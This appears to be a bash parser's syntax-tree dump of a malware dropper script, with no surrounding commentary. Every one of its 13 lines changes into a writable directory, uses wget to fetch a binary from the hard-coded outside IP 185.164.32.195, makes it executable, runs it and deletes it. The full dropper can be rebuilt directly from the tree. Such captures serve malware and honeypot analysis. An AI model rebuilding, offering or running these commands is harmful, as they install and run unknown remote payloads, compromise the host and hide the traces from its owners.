ListNode(lineno=2, pos=(12, 130), parts=[
  CommandNode(lineno=2, pos=(12, 19), parts=[
    WordNode(lineno=2, pos=(12, 14), word='cd'),
    WordNode(lineno=2, pos=(15, 19), word='/tmp'),
  ]),
  OperatorNode(lineno=2, op='||', pos=(20, 22)),
  CommandNode(lineno=2, pos=(23, 34), parts=[
    WordNode(lineno=2, pos=(23, 25), word='cd'),
    WordNode(lineno=2, pos=(26, 34), word='/var/run'),
  ]),
  OperatorNode(lineno=2, op='||', pos=(35, 37)),
  CommandNode(lineno=2, pos=(38, 45), parts=[
    WordNode(lineno=2, pos=(38, 40), word='cd'),
    WordNode(lineno=2, pos=(41, 45), word='/mnt'),
  ]),
  OperatorNode(lineno=2, op='||', pos=(46, 48)),
  CommandNode(lineno=2, pos=(49, 57), parts=[
    WordNode(lineno=2, pos=(49, 51), word='cd'),
    WordNode(lineno=2, pos=(52, 57), word='/root'),
  ]),
  OperatorNode(lineno=2, op='||', pos=(58, 60)),
  CommandNode(lineno=2, pos=(61, 65), parts=[
    WordNode(lineno=2, pos=(61, 63), word='cd'),
    WordNode(lineno=2, pos=(64, 65), word='/'),
  ]),
  OperatorNode(lineno=2, op=';', pos=(65, 66)),
  CommandNode(lineno=2, pos=(67, 97), parts=[
    WordNode(lineno=2, pos=(67, 71), word='wget'),
    WordNode(lineno=2, pos=(72, 97), word='http://185.164.32.195/sdd'),
  ]),
  OperatorNode(lineno=2, op=';', pos=(97, 98)),
  CommandNode(lineno=2, pos=(99, 111), parts=[
    WordNode(lineno=2, pos=(99, 104), word='chmod'),
    WordNode(lineno=2, pos=(105, 107), word='+x'),
    WordNode(lineno=2, pos=(108, 111), word='sdd'),
  ]),
  OperatorNode(lineno=2, op=';', pos=(111, 112)),
  CommandNode(lineno=2, pos=(113, 118), parts=[
    WordNode(lineno=2, pos=(113, 118), word='./sdd'),
  ]),
  OperatorNode(lineno=2, op=';', pos=(118, 119)),
  CommandNode(lineno=2, pos=(120, 130), parts=[
    WordNode(lineno=2, pos=(120, 122), word='rm'),
    WordNode(lineno=2, pos=(123, 126), word='-rf'),
    WordNode(lineno=2, pos=(127, 130), word='sdd'),
  ]),
])
ListNode(lineno=3, pos=(131, 253), parts=[
  CommandNode(lineno=3, pos=(131, 138), parts=[
    WordNode(lineno=3, pos=(131, 133), word='cd'),
    WordNode(lineno=3, pos=(134, 138), word='/tmp'),
  ]),
  OperatorNode(lineno=3, op='||', pos=(139, 141)),
  CommandNode(lineno=3, pos=(142, 153), parts=[
    WordNode(lineno=3, pos=(142, 144), word='cd'),
    WordNode(lineno=3, pos=(145, 153), word='/var/run'),
  ]),
  OperatorNode(lineno=3, op='||', pos=(154, 156)),
  CommandNode(lineno=3, pos=(157, 164), parts=[
    WordNode(lineno=3, pos=(157, 159), word='cd'),
    WordNode(lineno=3, pos=(160, 164), word='/mnt'),
  ]),
  OperatorNode(lineno=3, op='||', pos=(165, 167)),
  CommandNode(lineno=3, pos=(168, 176), parts=[
    WordNode(lineno=3, pos=(168, 170), word='cd'),
    WordNode(lineno=3, pos=(171, 176), word='/root'),
  ]),
  OperatorNode(lineno=3, op='||', pos=(177, 179)),
  CommandNode(lineno=3, pos=(180, 184), parts=[
    WordNode(lineno=3, pos=(180, 182), word='cd'),
    WordNode(lineno=3, pos=(183, 184), word='/'),
  ]),
  OperatorNode(lineno=3, op=';', pos=(184, 185)),
  CommandNode(lineno=3, pos=(186, 217), parts=[
    WordNode(lineno=3, pos=(186, 190), word='wget'),
    WordNode(lineno=3, pos=(191, 217), word='http://185.164.32.195/asss'),
  ]),
  OperatorNode(lineno=3, op=';', pos=(217, 218)),
  CommandNode(lineno=3, pos=(219, 232), parts=[
    WordNode(lineno=3, pos=(219, 224), word='chmod'),
    WordNode(lineno=3, pos=(225, 227), word='+x'),
    WordNode(lineno=3, pos=(228, 232), word='asss'),
  ]),
  OperatorNode(lineno=3, op=';', pos=(232, 233)),
  CommandNode(lineno=3, pos=(234, 240), parts=[
    WordNode(lineno=3, pos=(234, 240), word='./asss'),
  ]),
  OperatorNode(lineno=3, op=';', pos=(240, 241)),
  CommandNode(lineno=3, pos=(242, 253), parts=[
    WordNode(lineno=3, pos=(242, 244), word='rm'),
    WordNode(lineno=3, pos=(245, 248), word='-rf'),
    WordNode(lineno=3, pos=(249, 253), word='asss'),
  ]),
])
ListNode(lineno=4, pos=(254, 376), parts=[
  CommandNode(lineno=4, pos=(254, 261), parts=[
    WordNode(lineno=4, pos=(254, 256), word='cd'),
    WordNode(lineno=4, pos=(257, 261), word='/tmp'),
  ]),
  OperatorNode(lineno=4, op='||', pos=(262, 264)),
  CommandNode(lineno=4, pos=(265, 276), parts=[
    WordNode(lineno=4, pos=(265, 267), word='cd'),
    WordNode(lineno=4, pos=(268, 276), word='/var/run'),
  ]),
  OperatorNode(lineno=4, op='||', pos=(277, 279)),
  CommandNode(lineno=4, pos=(280, 287), parts=[
    WordNode(lineno=4, pos=(280, 282), word='cd'),
    WordNode(lineno=4, pos=(283, 287), word='/mnt'),
  ]),
  OperatorNode(lineno=4, op='||', pos=(288, 290)),
  CommandNode(lineno=4, pos=(291, 299), parts=[
    WordNode(lineno=4, pos=(291, 293), word='cd'),
    WordNode(lineno=4, pos=(294, 299), word='/root'),
  ]),
  OperatorNode(lineno=4, op='||', pos=(300, 302)),
  CommandNode(lineno=4, pos=(303, 307), parts=[
    WordNode(lineno=4, pos=(303, 305), word='cd'),
    WordNode(lineno=4, pos=(306, 307), word='/'),
  ]),
  OperatorNode(lineno=4, op=';', pos=(307, 308)),
  CommandNode(lineno=4, pos=(309, 340), parts=[
    WordNode(lineno=4, pos=(309, 313), word='wget'),
    WordNode(lineno=4, pos=(314, 340), word='http://185.164.32.195/sdff'),
  ]),
  OperatorNode(lineno=4, op=';', pos=(340, 341)),
  CommandNode(lineno=4, pos=(342, 355), parts=[
    WordNode(lineno=4, pos=(342, 347), word='chmod'),
    WordNode(lineno=4, pos=(348, 350), word='+x'),
    WordNode(lineno=4, pos=(351, 355), word='sdff'),
  ]),
  OperatorNode(lineno=4, op=';', pos=(355, 356)),
  CommandNode(lineno=4, pos=(357, 363), parts=[
    WordNode(lineno=4, pos=(357, 363), word='./sdff'),
  ]),
  OperatorNode(lineno=4, op=';', pos=(363, 364)),
  CommandNode(lineno=4, pos=(365, 376), parts=[
    WordNode(lineno=4, pos=(365, 367), word='rm'),
    WordNode(lineno=4, pos=(368, 371), word='-rf'),
    WordNode(lineno=4, pos=(372, 376), word='sdff'),
  ]),
])
ListNode(lineno=5, pos=(377, 499), parts=[
  CommandNode(lineno=5, pos=(377, 384), parts=[
    WordNode(lineno=5, pos=(377, 379), word='cd'),
    WordNode(lineno=5, pos=(380, 384), word='/tmp'),
  ]),
  OperatorNode(lineno=5, op='||', pos=(385, 387)),
  CommandNode(lineno=5, pos=(388, 399), parts=[
    WordNode(lineno=5, pos=(388, 390), word='cd'),
    WordNode(lineno=5, pos=(391, 399), word='/var/run'),
  ]),
  OperatorNode(lineno=5, op='||', pos=(400, 402)),
  CommandNode(lineno=5, pos=(403, 410), parts=[
    WordNode(lineno=5, pos=(403, 405), word='cd'),
    WordNode(lineno=5, pos=(406, 410), word='/mnt'),
  ]),
  OperatorNode(lineno=5, op='||', pos=(411, 413)),
  CommandNode(lineno=5, pos=(414, 422), parts=[
    WordNode(lineno=5, pos=(414, 416), word='cd'),
    WordNode(lineno=5, pos=(417, 422), word='/root'),
  ]),
  OperatorNode(lineno=5, op='||', pos=(423, 425)),
  CommandNode(lineno=5, pos=(426, 430), parts=[
    WordNode(lineno=5, pos=(426, 428), word='cd'),
    WordNode(lineno=5, pos=(429, 430), word='/'),
  ]),
  OperatorNode(lineno=5, op=';', pos=(430, 431)),
  CommandNode(lineno=5, pos=(432, 463), parts=[
    WordNode(lineno=5, pos=(432, 436), word='wget'),
    WordNode(lineno=5, pos=(437, 463), word='http://185.164.32.195/fgfd'),
  ]),
  OperatorNode(lineno=5, op=';', pos=(463, 464)),
  CommandNode(lineno=5, pos=(465, 478), parts=[
    WordNode(lineno=5, pos=(465, 470), word='chmod'),
    WordNode(lineno=5, pos=(471, 473), word='+x'),
    WordNode(lineno=5, pos=(474, 478), word='fgfd'),
  ]),
  OperatorNode(lineno=5, op=';', pos=(478, 479)),
  CommandNode(lineno=5, pos=(480, 486), parts=[
    WordNode(lineno=5, pos=(480, 486), word='./fgfd'),
  ]),
  OperatorNode(lineno=5, op=';', pos=(486, 487)),
  CommandNode(lineno=5, pos=(488, 499), parts=[
    WordNode(lineno=5, pos=(488, 490), word='rm'),
    WordNode(lineno=5, pos=(491, 494), word='-rf'),
    WordNode(lineno=5, pos=(495, 499), word='fgfd'),
  ]),
])
ListNode(lineno=6, pos=(500, 622), parts=[
  CommandNode(lineno=6, pos=(500, 507), parts=[
    WordNode(lineno=6, pos=(500, 502), word='cd'),
    WordNode(lineno=6, pos=(503, 507), word='/tmp'),
  ]),
  OperatorNode(lineno=6, op='||', pos=(508, 510)),
  CommandNode(lineno=6, pos=(511, 522), parts=[
    WordNode(lineno=6, pos=(511, 513), word='cd'),
    WordNode(lineno=6, pos=(514, 522), word='/var/run'),
  ]),
  OperatorNode(lineno=6, op='||', pos=(523, 525)),
  CommandNode(lineno=6, pos=(526, 533), parts=[
    WordNode(lineno=6, pos=(526, 528), word='cd'),
    WordNode(lineno=6, pos=(529, 533), word='/mnt'),
  ]),
  OperatorNode(lineno=6, op='||', pos=(534, 536)),
  CommandNode(lineno=6, pos=(537, 545), parts=[
    WordNode(lineno=6, pos=(537, 539), word='cd'),
    WordNode(lineno=6, pos=(540, 545), word='/root'),
  ]),
  OperatorNode(lineno=6, op='||', pos=(546, 548)),
  CommandNode(lineno=6, pos=(549, 553), parts=[
    WordNode(lineno=6, pos=(549, 551), word='cd'),
    WordNode(lineno=6, pos=(552, 553), word='/'),
  ]),
  OperatorNode(lineno=6, op=';', pos=(553, 554)),
  CommandNode(lineno=6, pos=(555, 586), parts=[
    WordNode(lineno=6, pos=(555, 559), word='wget'),
    WordNode(lineno=6, pos=(560, 586), word='http://185.164.32.195/gfgd'),
  ]),
  OperatorNode(lineno=6, op=';', pos=(586, 587)),
  CommandNode(lineno=6, pos=(588, 601), parts=[
    WordNode(lineno=6, pos=(588, 593), word='chmod'),
    WordNode(lineno=6, pos=(594, 596), word='+x'),
    WordNode(lineno=6, pos=(597, 601), word='gfgd'),
  ]),
  OperatorNode(lineno=6, op=';', pos=(601, 602)),
  CommandNode(lineno=6, pos=(603, 609), parts=[
    WordNode(lineno=6, pos=(603, 609), word='./gfgd'),
  ]),
  OperatorNode(lineno=6, op=';', pos=(609, 610)),
  CommandNode(lineno=6, pos=(611, 622), parts=[
    WordNode(lineno=6, pos=(611, 613), word='rm'),
    WordNode(lineno=6, pos=(614, 617), word='-rf'),
    WordNode(lineno=6, pos=(618, 622), word='gfgd'),
  ]),
])
ListNode(lineno=7, pos=(623, 749), parts=[
  CommandNode(lineno=7, pos=(623, 630), parts=[
    WordNode(lineno=7, pos=(623, 625), word='cd'),
    WordNode(lineno=7, pos=(626, 630), word='/tmp'),
  ]),
  OperatorNode(lineno=7, op='||', pos=(631, 633)),
  CommandNode(lineno=7, pos=(634, 645), parts=[
    WordNode(lineno=7, pos=(634, 636), word='cd'),
    WordNode(lineno=7, pos=(637, 645), word='/var/run'),
  ]),
  OperatorNode(lineno=7, op='||', pos=(646, 648)),
  CommandNode(lineno=7, pos=(649, 656), parts=[
    WordNode(lineno=7, pos=(649, 651), word='cd'),
    WordNode(lineno=7, pos=(652, 656), word='/mnt'),
  ]),
  OperatorNode(lineno=7, op='||', pos=(657, 659)),
  CommandNode(lineno=7, pos=(660, 668), parts=[
    WordNode(lineno=7, pos=(660, 662), word='cd'),
    WordNode(lineno=7, pos=(663, 668), word='/root'),
  ]),
  OperatorNode(lineno=7, op='||', pos=(669, 671)),
  CommandNode(lineno=7, pos=(672, 676), parts=[
    WordNode(lineno=7, pos=(672, 674), word='cd'),
    WordNode(lineno=7, pos=(675, 676), word='/'),
  ]),
  OperatorNode(lineno=7, op=';', pos=(676, 677)),
  CommandNode(lineno=7, pos=(678, 710), parts=[
    WordNode(lineno=7, pos=(678, 682), word='wget'),
    WordNode(lineno=7, pos=(683, 710), word='http://185.164.32.195/ssaaa'),
  ]),
  OperatorNode(lineno=7, op=';', pos=(710, 711)),
  CommandNode(lineno=7, pos=(712, 726), parts=[
    WordNode(lineno=7, pos=(712, 717), word='chmod'),
    WordNode(lineno=7, pos=(718, 720), word='+x'),
    WordNode(lineno=7, pos=(721, 726), word='ssaaa'),
  ]),
  OperatorNode(lineno=7, op=';', pos=(726, 727)),
  CommandNode(lineno=7, pos=(728, 735), parts=[
    WordNode(lineno=7, pos=(728, 735), word='./ssaaa'),
  ]),
  OperatorNode(lineno=7, op=';', pos=(735, 736)),
  CommandNode(lineno=7, pos=(737, 749), parts=[
    WordNode(lineno=7, pos=(737, 739), word='rm'),
    WordNode(lineno=7, pos=(740, 743), word='-rf'),
    WordNode(lineno=7, pos=(744, 749), word='ssaaa'),
  ]),
])
ListNode(lineno=8, pos=(750, 876), parts=[
  CommandNode(lineno=8, pos=(750, 757), parts=[
    WordNode(lineno=8, pos=(750, 752), word='cd'),
    WordNode(lineno=8, pos=(753, 757), word='/tmp'),
  ]),
  OperatorNode(lineno=8, op='||', pos=(758, 760)),
  CommandNode(lineno=8, pos=(761, 772), parts=[
    WordNode(lineno=8, pos=(761, 763), word='cd'),
    WordNode(lineno=8, pos=(764, 772), word='/var/run'),
  ]),
  OperatorNode(lineno=8, op='||', pos=(773, 775)),
  CommandNode(lineno=8, pos=(776, 783), parts=[
    WordNode(lineno=8, pos=(776, 778), word='cd'),
    WordNode(lineno=8, pos=(779, 783), word='/mnt'),
  ]),
  OperatorNode(lineno=8, op='||', pos=(784, 786)),
  CommandNode(lineno=8, pos=(787, 795), parts=[
    WordNode(lineno=8, pos=(787, 789), word='cd'),
    WordNode(lineno=8, pos=(790, 795), word='/root'),
  ]),
  OperatorNode(lineno=8, op='||', pos=(796, 798)),
  CommandNode(lineno=8, pos=(799, 803), parts=[
    WordNode(lineno=8, pos=(799, 801), word='cd'),
    WordNode(lineno=8, pos=(802, 803), word='/'),
  ]),
  OperatorNode(lineno=8, op=';', pos=(803, 804)),
  CommandNode(lineno=8, pos=(805, 837), parts=[
    WordNode(lineno=8, pos=(805, 809), word='wget'),
    WordNode(lineno=8, pos=(810, 837), word='http://185.164.32.195/swerf'),
  ]),
  OperatorNode(lineno=8, op=';', pos=(837, 838)),
  CommandNode(lineno=8, pos=(839, 853), parts=[
    WordNode(lineno=8, pos=(839, 844), word='chmod'),
    WordNode(lineno=8, pos=(845, 847), word='+x'),
    WordNode(lineno=8, pos=(848, 853), word='swerf'),
  ]),
  OperatorNode(lineno=8, op=';', pos=(853, 854)),
  CommandNode(lineno=8, pos=(855, 862), parts=[
    WordNode(lineno=8, pos=(855, 862), word='./swerf'),
  ]),
  OperatorNode(lineno=8, op=';', pos=(862, 863)),
  CommandNode(lineno=8, pos=(864, 876), parts=[
    WordNode(lineno=8, pos=(864, 866), word='rm'),
    WordNode(lineno=8, pos=(867, 870), word='-rf'),
    WordNode(lineno=8, pos=(871, 876), word='swerf'),
  ]),
])
ListNode(lineno=9, pos=(877, 999), parts=[
  CommandNode(lineno=9, pos=(877, 884), parts=[
    WordNode(lineno=9, pos=(877, 879), word='cd'),
    WordNode(lineno=9, pos=(880, 884), word='/tmp'),
  ]),
  OperatorNode(lineno=9, op='||', pos=(885, 887)),
  CommandNode(lineno=9, pos=(888, 899), parts=[
    WordNode(lineno=9, pos=(888, 890), word='cd'),
    WordNode(lineno=9, pos=(891, 899), word='/var/run'),
  ]),
  OperatorNode(lineno=9, op='||', pos=(900, 902)),
  CommandNode(lineno=9, pos=(903, 910), parts=[
    WordNode(lineno=9, pos=(903, 905), word='cd'),
    WordNode(lineno=9, pos=(906, 910), word='/mnt'),
  ]),
  OperatorNode(lineno=9, op='||', pos=(911, 913)),
  CommandNode(lineno=9, pos=(914, 922), parts=[
    WordNode(lineno=9, pos=(914, 916), word='cd'),
    WordNode(lineno=9, pos=(917, 922), word='/root'),
  ]),
  OperatorNode(lineno=9, op='||', pos=(923, 925)),
  CommandNode(lineno=9, pos=(926, 930), parts=[
    WordNode(lineno=9, pos=(926, 928), word='cd'),
    WordNode(lineno=9, pos=(929, 930), word='/'),
  ]),
  OperatorNode(lineno=9, op=';', pos=(930, 931)),
  CommandNode(lineno=9, pos=(932, 963), parts=[
    WordNode(lineno=9, pos=(932, 936), word='wget'),
    WordNode(lineno=9, pos=(937, 963), word='http://185.164.32.195/ggbv'),
  ]),
  OperatorNode(lineno=9, op=';', pos=(963, 964)),
  CommandNode(lineno=9, pos=(965, 978), parts=[
    WordNode(lineno=9, pos=(965, 970), word='chmod'),
    WordNode(lineno=9, pos=(971, 973), word='+x'),
    WordNode(lineno=9, pos=(974, 978), word='ggbv'),
  ]),
  OperatorNode(lineno=9, op=';', pos=(978, 979)),
  CommandNode(lineno=9, pos=(980, 986), parts=[
    WordNode(lineno=9, pos=(980, 986), word='./ggbv'),
  ]),
  OperatorNode(lineno=9, op=';', pos=(986, 987)),
  CommandNode(lineno=9, pos=(988, 999), parts=[
    WordNode(lineno=9, pos=(988, 990), word='rm'),
    WordNode(lineno=9, pos=(991, 994), word='-rf'),
    WordNode(lineno=9, pos=(995, 999), word='ggbv'),
  ]),
])
ListNode(lineno=10, pos=(1000, 1122), parts=[
  CommandNode(lineno=10, pos=(1000, 1007), parts=[
    WordNode(lineno=10, pos=(1000, 1002), word='cd'),
    WordNode(lineno=10, pos=(1003, 1007), word='/tmp'),
  ]),
  OperatorNode(lineno=10, op='||', pos=(1008, 1010)),
  CommandNode(lineno=10, pos=(1011, 1022), parts=[
    WordNode(lineno=10, pos=(1011, 1013), word='cd'),
    WordNode(lineno=10, pos=(1014, 1022), word='/var/run'),
  ]),
  OperatorNode(lineno=10, op='||', pos=(1023, 1025)),
  CommandNode(lineno=10, pos=(1026, 1033), parts=[
    WordNode(lineno=10, pos=(1026, 1028), word='cd'),
    WordNode(lineno=10, pos=(1029, 1033), word='/mnt'),
  ]),
  OperatorNode(lineno=10, op='||', pos=(1034, 1036)),
  CommandNode(lineno=10, pos=(1037, 1045), parts=[
    WordNode(lineno=10, pos=(1037, 1039), word='cd'),
    WordNode(lineno=10, pos=(1040, 1045), word='/root'),
  ]),
  OperatorNode(lineno=10, op='||', pos=(1046, 1048)),
  CommandNode(lineno=10, pos=(1049, 1053), parts=[
    WordNode(lineno=10, pos=(1049, 1051), word='cd'),
    WordNode(lineno=10, pos=(1052, 1053), word='/'),
  ]),
  OperatorNode(lineno=10, op=';', pos=(1053, 1054)),
  CommandNode(lineno=10, pos=(1055, 1086), parts=[
    WordNode(lineno=10, pos=(1055, 1059), word='wget'),
    WordNode(lineno=10, pos=(1060, 1086), word='http://185.164.32.195/dffd'),
  ]),
  OperatorNode(lineno=10, op=';', pos=(1086, 1087)),
  CommandNode(lineno=10, pos=(1088, 1101), parts=[
    WordNode(lineno=10, pos=(1088, 1093), word='chmod'),
    WordNode(lineno=10, pos=(1094, 1096), word='+x'),
    WordNode(lineno=10, pos=(1097, 1101), word='dffd'),
  ]),
  OperatorNode(lineno=10, op=';', pos=(1101, 1102)),
  CommandNode(lineno=10, pos=(1103, 1109), parts=[
    WordNode(lineno=10, pos=(1103, 1109), word='./dffd'),
  ]),
  OperatorNode(lineno=10, op=';', pos=(1109, 1110)),
  CommandNode(lineno=10, pos=(1111, 1122), parts=[
    WordNode(lineno=10, pos=(1111, 1113), word='rm'),
    WordNode(lineno=10, pos=(1114, 1117), word='-rf'),
    WordNode(lineno=10, pos=(1118, 1122), word='dffd'),
  ]),
])
ListNode(lineno=11, pos=(1123, 1245), parts=[
  CommandNode(lineno=11, pos=(1123, 1130), parts=[
    WordNode(lineno=11, pos=(1123, 1125), word='cd'),
    WordNode(lineno=11, pos=(1126, 1130), word='/tmp'),
  ]),
  OperatorNode(lineno=11, op='||', pos=(1131, 1133)),
  CommandNode(lineno=11, pos=(1134, 1145), parts=[
    WordNode(lineno=11, pos=(1134, 1136), word='cd'),
    WordNode(lineno=11, pos=(1137, 1145), word='/var/run'),
  ]),
  OperatorNode(lineno=11, op='||', pos=(1146, 1148)),
  CommandNode(lineno=11, pos=(1149, 1156), parts=[
    WordNode(lineno=11, pos=(1149, 1151), word='cd'),
    WordNode(lineno=11, pos=(1152, 1156), word='/mnt'),
  ]),
  OperatorNode(lineno=11, op='||', pos=(1157, 1159)),
  CommandNode(lineno=11, pos=(1160, 1168), parts=[
    WordNode(lineno=11, pos=(1160, 1162), word='cd'),
    WordNode(lineno=11, pos=(1163, 1168), word='/root'),
  ]),
  OperatorNode(lineno=11, op='||', pos=(1169, 1171)),
  CommandNode(lineno=11, pos=(1172, 1176), parts=[
    WordNode(lineno=11, pos=(1172, 1174), word='cd'),
    WordNode(lineno=11, pos=(1175, 1176), word='/'),
  ]),
  OperatorNode(lineno=11, op=';', pos=(1176, 1177)),
  CommandNode(lineno=11, pos=(1178, 1209), parts=[
    WordNode(lineno=11, pos=(1178, 1182), word='wget'),
    WordNode(lineno=11, pos=(1183, 1209), word='http://185.164.32.195/dsds'),
  ]),
  OperatorNode(lineno=11, op=';', pos=(1209, 1210)),
  CommandNode(lineno=11, pos=(1211, 1224), parts=[
    WordNode(lineno=11, pos=(1211, 1216), word='chmod'),
    WordNode(lineno=11, pos=(1217, 1219), word='+x'),
    WordNode(lineno=11, pos=(1220, 1224), word='dsds'),
  ]),
  OperatorNode(lineno=11, op=';', pos=(1224, 1225)),
  CommandNode(lineno=11, pos=(1226, 1232), parts=[
    WordNode(lineno=11, pos=(1226, 1232), word='./dsds'),
  ]),
  OperatorNode(lineno=11, op=';', pos=(1232, 1233)),
  CommandNode(lineno=11, pos=(1234, 1245), parts=[
    WordNode(lineno=11, pos=(1234, 1236), word='rm'),
    WordNode(lineno=11, pos=(1237, 1240), word='-rf'),
    WordNode(lineno=11, pos=(1241, 1245), word='dsds'),
  ]),
])
ListNode(lineno=12, pos=(1246, 1364), parts=[
  CommandNode(lineno=12, pos=(1246, 1253), parts=[
    WordNode(lineno=12, pos=(1246, 1248), word='cd'),
    WordNode(lineno=12, pos=(1249, 1253), word='/tmp'),
  ]),
  OperatorNode(lineno=12, op='||', pos=(1254, 1256)),
  CommandNode(lineno=12, pos=(1257, 1268), parts=[
    WordNode(lineno=12, pos=(1257, 1259), word='cd'),
    WordNode(lineno=12, pos=(1260, 1268), word='/var/run'),
  ]),
  OperatorNode(lineno=12, op='||', pos=(1269, 1271)),
  CommandNode(lineno=12, pos=(1272, 1279), parts=[
    WordNode(lineno=12, pos=(1272, 1274), word='cd'),
    WordNode(lineno=12, pos=(1275, 1279), word='/mnt'),
  ]),
  OperatorNode(lineno=12, op='||', pos=(1280, 1282)),
  CommandNode(lineno=12, pos=(1283, 1291), parts=[
    WordNode(lineno=12, pos=(1283, 1285), word='cd'),
    WordNode(lineno=12, pos=(1286, 1291), word='/root'),
  ]),
  OperatorNode(lineno=12, op='||', pos=(1292, 1294)),
  CommandNode(lineno=12, pos=(1295, 1299), parts=[
    WordNode(lineno=12, pos=(1295, 1297), word='cd'),
    WordNode(lineno=12, pos=(1298, 1299), word='/'),
  ]),
  OperatorNode(lineno=12, op=';', pos=(1299, 1300)),
  CommandNode(lineno=12, pos=(1301, 1331), parts=[
    WordNode(lineno=12, pos=(1301, 1305), word='wget'),
    WordNode(lineno=12, pos=(1306, 1331), word='http://185.164.32.195/zxc'),
  ]),
  OperatorNode(lineno=12, op=';', pos=(1331, 1332)),
  CommandNode(lineno=12, pos=(1333, 1345), parts=[
    WordNode(lineno=12, pos=(1333, 1338), word='chmod'),
    WordNode(lineno=12, pos=(1339, 1341), word='+x'),
    WordNode(lineno=12, pos=(1342, 1345), word='zxc'),
  ]),
  OperatorNode(lineno=12, op=';', pos=(1345, 1346)),
  CommandNode(lineno=12, pos=(1347, 1352), parts=[
    WordNode(lineno=12, pos=(1347, 1352), word='./zxc'),
  ]),
  OperatorNode(lineno=12, op=';', pos=(1352, 1353)),
  CommandNode(lineno=12, pos=(1354, 1364), parts=[
    WordNode(lineno=12, pos=(1354, 1356), word='rm'),
    WordNode(lineno=12, pos=(1357, 1360), word='-rf'),
    WordNode(lineno=12, pos=(1361, 1364), word='zxc'),
  ]),
])
ListNode(lineno=13, pos=(1365, 1483), parts=[
  CommandNode(lineno=13, pos=(1365, 1372), parts=[
    WordNode(lineno=13, pos=(1365, 1367), word='cd'),
    WordNode(lineno=13, pos=(1368, 1372), word='/tmp'),
  ]),
  OperatorNode(lineno=13, op='||', pos=(1373, 1375)),
  CommandNode(lineno=13, pos=(1376, 1387), parts=[
    WordNode(lineno=13, pos=(1376, 1378), word='cd'),
    WordNode(lineno=13, pos=(1379, 1387), word='/var/run'),
  ]),
  OperatorNode(lineno=13, op='||', pos=(1388, 1390)),
  CommandNode(lineno=13, pos=(1391, 1398), parts=[
    WordNode(lineno=13, pos=(1391, 1393), word='cd'),
    WordNode(lineno=13, pos=(1394, 1398), word='/mnt'),
  ]),
  OperatorNode(lineno=13, op='||', pos=(1399, 1401)),
  CommandNode(lineno=13, pos=(1402, 1410), parts=[
    WordNode(lineno=13, pos=(1402, 1404), word='cd'),
    WordNode(lineno=13, pos=(1405, 1410), word='/root'),
  ]),
  OperatorNode(lineno=13, op='||', pos=(1411, 1413)),
  CommandNode(lineno=13, pos=(1414, 1418), parts=[
    WordNode(lineno=13, pos=(1414, 1416), word='cd'),
    WordNode(lineno=13, pos=(1417, 1418), word='/'),
  ]),
  OperatorNode(lineno=13, op=';', pos=(1418, 1419)),
  CommandNode(lineno=13, pos=(1420, 1450), parts=[
    WordNode(lineno=13, pos=(1420, 1424), word='wget'),
    WordNode(lineno=13, pos=(1425, 1450), word='http://185.164.32.195/vcx'),
  ]),
  OperatorNode(lineno=13, op=';', pos=(1450, 1451)),
  CommandNode(lineno=13, pos=(1452, 1464), parts=[
    WordNode(lineno=13, pos=(1452, 1457), word='chmod'),
    WordNode(lineno=13, pos=(1458, 1460), word='+x'),
    WordNode(lineno=13, pos=(1461, 1464), word='vcx'),
  ]),
  OperatorNode(lineno=13, op=';', pos=(1464, 1465)),
  CommandNode(lineno=13, pos=(1466, 1471), parts=[
    WordNode(lineno=13, pos=(1466, 1471), word='./vcx'),
  ]),
  OperatorNode(lineno=13, op=';', pos=(1471, 1472)),
  CommandNode(lineno=13, pos=(1473, 1483), parts=[
    WordNode(lineno=13, pos=(1473, 1475), word='rm'),
    WordNode(lineno=13, pos=(1476, 1479), word='-rf'),
    WordNode(lineno=13, pos=(1480, 1483), word='vcx'),
  ]),
])
ListNode(lineno=14, pos=(1484, 1610), parts=[
  CommandNode(lineno=14, pos=(1484, 1491), parts=[
    WordNode(lineno=14, pos=(1484, 1486), word='cd'),
    WordNode(lineno=14, pos=(1487, 1491), word='/tmp'),
  ]),
  OperatorNode(lineno=14, op='||', pos=(1492, 1494)),
  CommandNode(lineno=14, pos=(1495, 1506), parts=[
    WordNode(lineno=14, pos=(1495, 1497), word='cd'),
    WordNode(lineno=14, pos=(1498, 1506), word='/var/run'),
  ]),
  OperatorNode(lineno=14, op='||', pos=(1507, 1509)),
  CommandNode(lineno=14, pos=(1510, 1517), parts=[
    WordNode(lineno=14, pos=(1510, 1512), word='cd'),
    WordNode(lineno=14, pos=(1513, 1517), word='/mnt'),
  ]),
  OperatorNode(lineno=14, op='||', pos=(1518, 1520)),
  CommandNode(lineno=14, pos=(1521, 1529), parts=[
    WordNode(lineno=14, pos=(1521, 1523), word='cd'),
    WordNode(lineno=14, pos=(1524, 1529), word='/root'),
  ]),
  OperatorNode(lineno=14, op='||', pos=(1530, 1532)),
  CommandNode(lineno=14, pos=(1533, 1537), parts=[
    WordNode(lineno=14, pos=(1533, 1535), word='cd'),
    WordNode(lineno=14, pos=(1536, 1537), word='/'),
  ]),
  OperatorNode(lineno=14, op=';', pos=(1537, 1538)),
  CommandNode(lineno=14, pos=(1539, 1571), parts=[
    WordNode(lineno=14, pos=(1539, 1543), word='wget'),
    WordNode(lineno=14, pos=(1544, 1571), word='http://185.164.32.195/sdfvc'),
  ]),
  OperatorNode(lineno=14, op=';', pos=(1571, 1572)),
  CommandNode(lineno=14, pos=(1573, 1587), parts=[
    WordNode(lineno=14, pos=(1573, 1578), word='chmod'),
    WordNode(lineno=14, pos=(1579, 1581), word='+x'),
    WordNode(lineno=14, pos=(1582, 1587), word='sdfvc'),
  ]),
  OperatorNode(lineno=14, op=';', pos=(1587, 1588)),
  CommandNode(lineno=14, pos=(1589, 1596), parts=[
    WordNode(lineno=14, pos=(1589, 1596), word='./sdfvc'),
  ]),
  OperatorNode(lineno=14, op=';', pos=(1596, 1597)),
  CommandNode(lineno=14, pos=(1598, 1610), parts=[
    WordNode(lineno=14, pos=(1598, 1600), word='rm'),
    WordNode(lineno=14, pos=(1601, 1604), word='-rf'),
    WordNode(lineno=14, pos=(1605, 1610), word='sdfvc'),
  ]),
])
